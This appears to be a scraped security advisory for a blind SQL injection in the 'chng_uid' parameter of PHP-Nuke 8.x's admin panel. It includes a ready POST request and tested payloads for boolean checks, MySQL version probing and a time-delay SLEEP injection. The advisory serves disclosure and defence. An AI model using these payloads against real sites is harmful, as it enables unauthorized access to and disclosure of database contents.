PHP-Nuke 8.x <= "chng_uid" Blind SQL Injection Vulnerability

🗓️ 28 Mar 2011 00:00:00Reported by RootType

PHP-Nuke 8.x "chng_uid" Blind SQL Injection Vulnerability. Web Portal System for news distribution and article discussion. Unsanitized "chng_uid" parameter in /admin.php allows SQL injection leading to data manipulation/disclosur


                                                =&gt; /admin.php

POST /admin.php HTTP/1.1
Referer: http://localhost/admin.php?op=mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

chng_uid=[BLIND_SQL_INJECTION]+&amp;op=modifyUser


Tested Payloads:
' or 1=1-- [TRUE]
' or 1=2-- [FALSE]
' or substring(@@version,1,1)=5--  [TRUE if mySQL version is 5.x]
' or substring(@@version,1,1)=4--  [FALSE if mySQL version is 5.x]
' or SLEEP(15)=0-- [sleep for 15 seconds]

Successful response (True) returns the user update form page.

28 Mar 2011 00:00Current

7.6High risk

Vulners AI Score7.6

PHP-Nuke 8.x &lt;= &quot;chng_uid&quot; Blind SQL Injection Vulnerability

PHP-Nuke 8.x <= "chng_uid" Blind SQL Injection Vulnerability